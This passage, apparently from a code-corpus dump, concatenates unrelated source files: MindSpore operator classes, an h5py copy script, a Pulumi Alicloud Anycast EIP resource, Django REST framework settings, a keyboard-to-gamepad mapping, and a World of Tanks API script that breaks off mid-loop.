- **input_x** (tuple[Tensor]) - The `input_x` contains the outputs of bprop to be checked.
- **input_y** (tuple[Tensor]) - The `input_y` contains the inputs of bprop to check against.
Outputs:
(tuple[Tensor]), the `input_x`,
if data type and shape of corresponding elements from `input_x` and `input_y` are the same.
Raises:
TypeError: If `input_x` or `input_y` is not a Tensor.
Examples:
>>> input_x = (Tensor(np.array([[2, 2], [2, 2]]), mindspore.float32),)
>>> input_y = (Tensor(np.array([[2, 2], [2, 2]]), mindspore.float32),)
>>> out = ops.CheckBprop()(input_x, input_y)
"""
@prim_attr_register
def __init__(self, prim_to_check=""):
"""Initialize CheckBprop"""
self.prim_to_check = prim_to_check
def infer_shape(self, xshapes, yshapes):
tips = f'Bprop of {self.prim_to_check}'
validator.check_value_type('grads', xshapes, (tuple,), tips)
validator.check_value_type('params', yshapes, (tuple,), tips)
if len(xshapes) < len(yshapes):
raise ValueError(f"{tips}, the size of output should be {len(yshapes)},"
f" but got {len(xshapes)}.")
checking_range = len(yshapes)
for i in range(checking_range):
xshape = xshapes[i]
yshape = yshapes[i]
if not xshape or not yshape:
continue
if xshape != yshape:
raise ValueError(f"{tips}, the shape of {i}th output should be {yshape},"
f" but got {xshape}.")
return xshapes
def infer_dtype(self, xdtypes, ydtypes):
tips = f'Bprop of {self.prim_to_check}'
validator.check_value_type('grads', xdtypes, (tuple,), tips)
validator.check_value_type('params', ydtypes, (tuple,), tips)
if len(xdtypes) < len(ydtypes):
raise ValueError(f"{tips}, the size of output should be {len(ydtypes)},"
f" but got {len(xdtypes)}.")
checking_range = len(ydtypes)
for i in range(checking_range):
xdtype = xdtypes[i]
ydtype = ydtypes[i]
if isinstance(xdtype, mstype.anything_type) or isinstance(ydtype, mstype.anything_type):
continue
if isinstance(ydtype, mstype.function_type):
if not isinstance(xdtype, mstype.env_type_type):
raise TypeError(f"{tips}, the dtype of {i}th output should be {mstype.env_type_type},"
f" but got {xdtype}.")
continue
if xdtype != ydtype:
raise TypeError(f"{tips}, the dtype of {i}th output should be {ydtype},"
f" but got {xdtype}.")
return xdtypes
class ConfusionMatrix(PrimitiveWithInfer):
r"""
Calculates the confusion matrix from labels and predictions.
Args:
num_classes (int): The num of classes.
dtype (str): Data type of confusion matrix. Default: 'int32'.
Inputs:
- **labels** (Tensor) - real labels, tensor of 1-D. the dtype must be non-negative Integer.
- **predictions** (Tensor) - the labels from prediction, tensor of 1-D.
the shape same as `labels` and the dtype must be non-negative Integer.
- **weights** (Tensor) - tensor of 1-D. the shape same as `predictions`.
Outputs:
Tensor, the confusion matrix, with shape (`num_classes`, `num_classes`).
Raises:
TypeError: If `num_classes` is not an int.
TypeError: If `dtype` is not a str.
TypeError: If `labels`, `predictions` or weight` is not a Tensor.
Examples:
>>> confusion_matrix = ops.ConfusionMatrix(4)
>>> labels = Tensor([0, 1, 1, 3], mindspore.int32)
>>> predictions = Tensor([1, 2, 1, 3], mindspore.int32)
>>> output = confusion_matrix(labels, predictions)
>>> print(output)
[[0 1 0 0]
[0 1 1 0]
[0 0 0 0]
[0 0 0 1]]
"""
@prim_attr_register
def __init__(self, num_classes, dtype="int32"):
"""Initialize ConfusionMatrix."""
validator.check_value_type("num_classes", num_classes, [int], self.name)
validator.check_value_type("dtype", dtype, [str], self.name)
def infer_shape(self, labels, predictions, weights=None):
validator.check('labels dimension', len(labels), '', 1, Rel.EQ, self.name)
validator.check('labels shape', labels, 'predictions shape', predictions, Rel.EQ, self.name)
if weights is not None:
validator.check('labels shape', labels, 'weights shape', weights, Rel.EQ, self.name)
ret = (self.num_classes, self.num_classes)
return ret
def infer_dtype(self, labels, predictions, weights=None):
validator.check_subclass('labels', labels, mstype.tensor, self.name)
validator.check_subclass('predictions', predictions, mstype.tensor, self.name)
if weights is not None:
validator.check_subclass('weights', weights, mstype.tensor, self.name)
args = {"labels": labels, "predictions": predictions}
validator.check_tensors_dtypes_same_and_valid(args, (mstype.number_type), self.name)
return labels
class PopulationCount(PrimitiveWithInfer):
r"""
Calculates population count.
Inputs:
- **input** (Tensor) - The data type must be int16 or uint16.
Outputs:
Tensor, with the same shape as the input.
Raises:
TypeError: If `input` is not a Tensor.
Supported Platforms:
``Ascend``
Examples:
>>> population_count = ops.PopulationCount()
>>> x_input = Tensor([0, 1, 3], mindspore.int16)
>>> output = population_count(x_input)
>>> print(output)
[0 1 2]
"""
@prim_attr_register
def __init__(self):
pass
def infer_shape(self, x_shape):
return x_shape
def infer_dtype(self, x_dtype):
validator.check_tensor_dtype_valid("x", x_dtype, (mstype.int16, mstype.uint16,), self.name)
return mstype.tensor_type(mstype.uint8)
class Push(PrimitiveWithInfer):
"""
Pushes the inputs of the corresponding optimizer to parameter server.
Args:
optim_type (string): The optimizer type. Default: 'ApplyMomentum'.
only_shape_indices (list): The indices of input of which only shape
will be pushed to parameter server. Default: None.
Inputs:
- **optim_inputs** (tuple) - The inputs for this kind of optimizer.
- **optim_input_shapes** (tuple) - The shapes of the inputs.
Outputs:
Tensor, the key of the weight which needs to be updated.
"""
@prim_attr_register
def __init__(self, optim_type='ApplyMomentum', only_shape_indices=None):
"""Initialize Push"""
self.add_prim_attr("primitive_target", "CPU")
self.add_prim_attr("_side_effect", True)
self.init_prim_io_names(inputs=['optim_inputs', 'optim_input_shapes'], outputs=['key'])
def infer_shape(self, inputs, shapes):
return [1]
def infer_dtype(self, inputs, shapes):
return mstype.uint64
class Pull(PrimitiveWithInfer):
"""
Pulls weight from parameter server.
Inputs:
- **key** (Tensor) - The key of the weight.
- **weight** (Tensor) - The weight to be updated.
Outputs:
None.
"""
@prim_attr_register
def __init__(self):
"""Initialize Pull"""
self.add_prim_attr("primitive_target", "CPU")
self.init_prim_io_names(inputs=['key', 'weight'], outputs=['output'])
def infer_shape(self, key_shape, weight_shape):
return [1]
def infer_dtype(self, key_dtype, weight_dtype):
return mstype.float32
class PullWeight(PrimitiveWithInfer):
"""
Pull weight by its names from server.
Inputs:
- **weight** (Tensor) - The weight to be pulled.
- **name** (String) - The full name of the weight.
- **index** (Int) - The index of the weight.
Outputs:
None.
"""
@prim_attr_register
def __init__(self):
"""Initialize PullWeight"""
self.add_prim_attr("primitive_target", "CPU")
self.init_prim_io_names(inputs=['weight', "name", "index"], outputs=['output'])
def infer_shape(self, weight, name, index):
return [1]
def infer_dtype(self, weight, name, index):
return mstype.float32
class PushWeight(PrimitiveWithInfer):
"""
Upload weight by its names to server.
Inputs:
- **weight** (Tensor) - The weight to be uploaded.
- **name** (String) - The full name of the weight.
- **index** (Int) - The index of the weight.
Outputs:
None.
"""
@prim_attr_register
def __init__(self):
"""Initialize PushWeight"""
self.add_prim_attr("primitive_target", "CPU")
self.init_prim_io_names(inputs=['weight', "name", "index"], outputs=['output'])
def infer_shape(self, weight, name, index):
return [1]
def infer_dtype(self, weight, ps_key, index):
return mstype.float32
class identity(Primitive):
"""
Makes a identify primitive, used for pynative mode.
Inputs:
- **x** (Any) - identity input value.
Outputs:
The same as input.
"""
# Side effect will propagated from the first argument to return value.
side_effect_propagate = 1
@prim_attr_register
def __init__(self):
"""Initialize identity."""
self.add_prim_attr('side_effect_propagate', 1)
def __call__(self, x):
return x
| 36.9375 | 118 | 0.607885 |
0533fa5e6db86490f97a871cdb346354e18376ef | 99 | py | Python | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | 1 | 2020-05-01T04:19:05.000Z | 2020-05-01T04:19:05.000Z | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | 2 | 2017-11-22T18:56:26.000Z | 2017-11-22T19:08:31.000Z | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | null | null | null | import h5py
f = h5py.File('M3.00Z0.020.0079001.se.h5')
f.copy('cycle0000079999','cycle0000080000')
| 24.75 | 43 | 0.747475 |
b0625f8b4d4a383791130b994b0a80ebfcbd2fc0 | 21,087 | py | Python | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AnycastEipAddressArgs', 'AnycastEipAddress']
@pulumi.input_type
class AnycastEipAddressArgs:
def __init__(__self__, *,
service_location: pulumi.Input[str],
anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
bandwidth: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
internet_charge_type: Optional[pulumi.Input[str]] = None,
payment_type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a AnycastEipAddress resource.
:param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
:param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
:param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
:param pulumi.Input[str] description: Anycast EIP instance description.
:param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
:param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
"""
pulumi.set(__self__, "service_location", service_location)
if anycast_eip_address_name is not None:
pulumi.set(__self__, "anycast_eip_address_name", anycast_eip_address_name)
if bandwidth is not None:
pulumi.set(__self__, "bandwidth", bandwidth)
if description is not None:
pulumi.set(__self__, "description", description)
if internet_charge_type is not None:
pulumi.set(__self__, "internet_charge_type", internet_charge_type)
if payment_type is not None:
pulumi.set(__self__, "payment_type", payment_type)
@property
@pulumi.getter(name="serviceLocation")
def service_location(self) -> pulumi.Input[str]:
"""
Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
"""
return pulumi.get(self, "service_location")
@service_location.setter
def service_location(self, value: pulumi.Input[str]):
pulumi.set(self, "service_location", value)
@property
@pulumi.getter(name="anycastEipAddressName")
def anycast_eip_address_name(self) -> Optional[pulumi.Input[str]]:
"""
Anycast EIP instance name.
"""
return pulumi.get(self, "anycast_eip_address_name")
@anycast_eip_address_name.setter
def anycast_eip_address_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "anycast_eip_address_name", value)
@property
@pulumi.getter
def bandwidth(self) -> Optional[pulumi.Input[int]]:
"""
The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
"""
return pulumi.get(self, "bandwidth")
@bandwidth.setter
def bandwidth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "bandwidth", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Anycast EIP instance description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="internetChargeType")
def internet_charge_type(self) -> Optional[pulumi.Input[str]]:
"""
The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
"""
return pulumi.get(self, "internet_charge_type")
@internet_charge_type.setter
def internet_charge_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internet_charge_type", value)
@property
@pulumi.getter(name="paymentType")
def payment_type(self) -> Optional[pulumi.Input[str]]:
"""
The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
"""
return pulumi.get(self, "payment_type")
@payment_type.setter
def payment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "payment_type", value)
@pulumi.input_type
class _AnycastEipAddressState:
def __init__(__self__, *,
anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
bandwidth: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
internet_charge_type: Optional[pulumi.Input[str]] = None,
payment_type: Optional[pulumi.Input[str]] = None,
service_location: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering AnycastEipAddress resources.
:param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
:param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
:param pulumi.Input[str] description: Anycast EIP instance description.
:param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
:param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
:param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
:param pulumi.Input[str] status: The IP status.
"""
if anycast_eip_address_name is not None:
pulumi.set(__self__, "anycast_eip_address_name", anycast_eip_address_name)
if bandwidth is not None:
pulumi.set(__self__, "bandwidth", bandwidth)
if description is not None:
pulumi.set(__self__, "description", description)
if internet_charge_type is not None:
pulumi.set(__self__, "internet_charge_type", internet_charge_type)
if payment_type is not None:
pulumi.set(__self__, "payment_type", payment_type)
if service_location is not None:
pulumi.set(__self__, "service_location", service_location)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="anycastEipAddressName")
def anycast_eip_address_name(self) -> Optional[pulumi.Input[str]]:
"""
Anycast EIP instance name.
"""
return pulumi.get(self, "anycast_eip_address_name")
@anycast_eip_address_name.setter
def anycast_eip_address_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "anycast_eip_address_name", value)
@property
@pulumi.getter
def bandwidth(self) -> Optional[pulumi.Input[int]]:
"""
The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
"""
return pulumi.get(self, "bandwidth")
@bandwidth.setter
def bandwidth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "bandwidth", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Anycast EIP instance description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="internetChargeType")
def internet_charge_type(self) -> Optional[pulumi.Input[str]]:
"""
The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
"""
return pulumi.get(self, "internet_charge_type")
@internet_charge_type.setter
def internet_charge_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internet_charge_type", value)
@property
@pulumi.getter(name="paymentType")
def payment_type(self) -> Optional[pulumi.Input[str]]:
"""
The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
"""
return pulumi.get(self, "payment_type")
@payment_type.setter
def payment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "payment_type", value)
@property
@pulumi.getter(name="serviceLocation")
def service_location(self) -> Optional[pulumi.Input[str]]:
"""
Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
"""
return pulumi.get(self, "service_location")
@service_location.setter
def service_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_location", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The IP status.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class AnycastEipAddress(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
bandwidth: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
internet_charge_type: Optional[pulumi.Input[str]] = None,
payment_type: Optional[pulumi.Input[str]] = None,
service_location: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Eipanycast Anycast Eip Address resource.
For information about Eipanycast Anycast Eip Address and how to use it, see [What is Anycast Eip Address](https://help.aliyun.com/document_detail/169284.html).
> **NOTE:** Available in v1.113.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.eipanycast.AnycastEipAddress("example", service_location="international")
```
## Import
Eipanycast Anycast Eip Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eipanycast/anycastEipAddress:AnycastEipAddress example <id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
:param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
:param pulumi.Input[str] description: Anycast EIP instance description.
:param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
:param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
:param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AnycastEipAddressArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Eipanycast Anycast Eip Address resource.
For information about Eipanycast Anycast Eip Address and how to use it, see [What is Anycast Eip Address](https://help.aliyun.com/document_detail/169284.html).
> **NOTE:** Available in v1.113.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.eipanycast.AnycastEipAddress("example", service_location="international")
```
## Import
Eipanycast Anycast Eip Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eipanycast/anycastEipAddress:AnycastEipAddress example <id>
```
:param str resource_name: The name of the resource.
:param AnycastEipAddressArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AnycastEipAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
bandwidth: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
internet_charge_type: Optional[pulumi.Input[str]] = None,
payment_type: Optional[pulumi.Input[str]] = None,
service_location: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AnycastEipAddressArgs.__new__(AnycastEipAddressArgs)
__props__.__dict__["anycast_eip_address_name"] = anycast_eip_address_name
__props__.__dict__["bandwidth"] = bandwidth
__props__.__dict__["description"] = description
__props__.__dict__["internet_charge_type"] = internet_charge_type
__props__.__dict__["payment_type"] = payment_type
if service_location is None and not opts.urn:
raise TypeError("Missing required property 'service_location'")
__props__.__dict__["service_location"] = service_location
__props__.__dict__["status"] = None
super(AnycastEipAddress, __self__).__init__(
'alicloud:eipanycast/anycastEipAddress:AnycastEipAddress',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
bandwidth: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
internet_charge_type: Optional[pulumi.Input[str]] = None,
payment_type: Optional[pulumi.Input[str]] = None,
service_location: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'AnycastEipAddress':
"""
Get an existing AnycastEipAddress resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
:param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
:param pulumi.Input[str] description: Anycast EIP instance description.
:param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
:param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
:param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
:param pulumi.Input[str] status: The IP status.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AnycastEipAddressState.__new__(_AnycastEipAddressState)
__props__.__dict__["anycast_eip_address_name"] = anycast_eip_address_name
__props__.__dict__["bandwidth"] = bandwidth
__props__.__dict__["description"] = description
__props__.__dict__["internet_charge_type"] = internet_charge_type
__props__.__dict__["payment_type"] = payment_type
__props__.__dict__["service_location"] = service_location
__props__.__dict__["status"] = status
return AnycastEipAddress(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="anycastEipAddressName")
def anycast_eip_address_name(self) -> pulumi.Output[Optional[str]]:
"""
Anycast EIP instance name.
"""
return pulumi.get(self, "anycast_eip_address_name")
@property
@pulumi.getter
def bandwidth(self) -> pulumi.Output[int]:
"""
The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
"""
return pulumi.get(self, "bandwidth")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Anycast EIP instance description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="internetChargeType")
def internet_charge_type(self) -> pulumi.Output[Optional[str]]:
"""
The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
"""
return pulumi.get(self, "internet_charge_type")
@property
@pulumi.getter(name="paymentType")
def payment_type(self) -> pulumi.Output[Optional[str]]:
"""
The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
"""
return pulumi.get(self, "payment_type")
@property
@pulumi.getter(name="serviceLocation")
def service_location(self) -> pulumi.Output[str]:
"""
Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
"""
return pulumi.get(self, "service_location")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The IP status.
"""
return pulumi.get(self, "status")
| 46.041485 | 202 | 0.668706 |
523412ab9a8fc66f5f353881c3de3c84ba2486b5 | 901 | py | Python | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | null | null | null | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | 2 | 2021-02-02T23:09:32.000Z | 2021-06-10T23:43:39.000Z | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | null | null | null | REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": [
"lego.apps.oauth.authentication.Authentication",
"rest_framework.authentication.SessionAuthentication",
"lego.apps.jwt.authentication.Authentication",
],
"DEFAULT_RENDERER_CLASSES": ["lego.utils.renderers.JSONRenderer"],
"DEFAULT_PARSER_CLASSES": [
"djangorestframework_camel_case.parser.CamelCaseJSONParser"
],
"DEFAULT_PERMISSION_CLASSES": [
"lego.apps.permissions.api.permissions.LegoPermissions"
],
"DEFAULT_FILTER_BACKENDS": [
"django_filters.rest_framework.DjangoFilterBackend",
"lego.apps.permissions.api.filters.LegoPermissionFilter",
],
"DEFAULT_PAGINATION_CLASS": "lego.utils.pagination.CursorPagination",
"PAGE_SIZE": 30,
"EXCEPTION_HANDLER": "lego.utils.exceptions.exception_handler",
"TEST_REQUEST_DEFAULT_FORMAT": "json",
}
| 39.173913 | 73 | 0.722531 |
9d013f5963723fe4e5bd547e456a880495fee69f | 1,489 | py | Python | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | import vgamepad as vg
bt = vg.DS4_BUTTONS
special_bt = vg.DS4_SPECIAL_BUTTONS
keys_dict = {'Key.esc': bt.DS4_BUTTON_SHARE, # Join game
'Key.up': bt.DS4_BUTTON_TRIANGLE, # Shoot up
'Key.down': bt.DS4_BUTTON_CROSS, # Shoot down
'Key.left': bt.DS4_BUTTON_SQUARE, # Shoot left
'Key.right': bt.DS4_BUTTON_CIRCLE, # Shoot right
"'q'": bt.DS4_BUTTON_SHOULDER_RIGHT, # Drop item
"'e'": bt.DS4_BUTTON_SHOULDER_LEFT, # Use item
'Key.ctrl_l': bt.DS4_BUTTON_TRIGGER_RIGHT, # Drop item
'Key.space': bt.DS4_BUTTON_TRIGGER_LEFT, # Use item
}
keys_joystick = {"'w'": (1, 120), # Move up
"'a'": (0, -120), # Move left
"'s'": (1, -120), # Move down
"'d'": (0, 120), # Move right
}
keys_special = {
'Key.tab': special_bt.DS4_SPECIAL_BUTTON_TOUCHPAD
}
keys_triggers = (
"'q'", # Drop item
"'e'" # Use item
)
def press_buttons(gamepad, all_keys):
x_y = [128, 128]
for key in keys_joystick:
if key in all_keys:
value = keys_joystick[key]
x_y[value[0]] += value[1]
gamepad.left_joystick(*x_y)
for k in all_keys:
if k in keys_dict:
gamepad.press_button(keys_dict[k])
def reset_buttons(gamepad):
for keys in keys_dict.values():
gamepad.release_button(keys)
gamepad.left_trigger(0)
gamepad.right_trigger(0)
| 30.387755 | 68 | 0.571525 |
629c5648013cac0153717750244a4413ec638dc9 | 1,736 | py | Python | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | 1 | 2017-01-30T14:59:25.000Z | 2017-01-30T14:59:25.000Z | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | null | null | null | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | null | null | null | #!/tools/common/linux/python/3.5.0/bin/python3
# originially run with python 2.6.6
# Using the API from https://developers.wargaming.net/reference/
# Acquired the original data set like this:
# curl 'https://api.worldoftanks.com/wot/encyclopedia/vehicles/?application_id=demo' | python -m json.tool > wot_api_vehicles.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/info/?application_id=demo' | python -m json.tool > wot_api_info.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/arenas/?application_id=demo' | python -m json.tool > wot_api_arenas.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/provisions/?application_id=demo' | python -m json.tool > wot_api_provisions.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/modules/?application_id=demo&nation=france&type=vehicleRadio' | python -m json.tool > wot_api_modules-france-vehicleRadio.json
# Where the module type can be:
module_types = ['vehicleRadio', 'vehicleEngine', 'vehicleGun', 'vehicleChassis', 'vehicleTurret']
# And the nations can be:
nation_types = ['france', 'germany', 'uk', 'usa', 'ussr', 'china', 'japan', 'czech']
tank_types = ['heavyTank', 'mediumTank', 'lightTank']
import os, sys, shlex, json, re
from pprint import pprint
with open('wot_api_vehicles.json') as json_file:
json = json.load(json_file)
print( type(json) )
print( json.keys() )
wot_veh_dat = json.get('data')
print( wot_veh_dat.keys() )
for veh_id, veh_dat in wot_veh_dat.items():
if veh_dat['type'] not in tank_types:
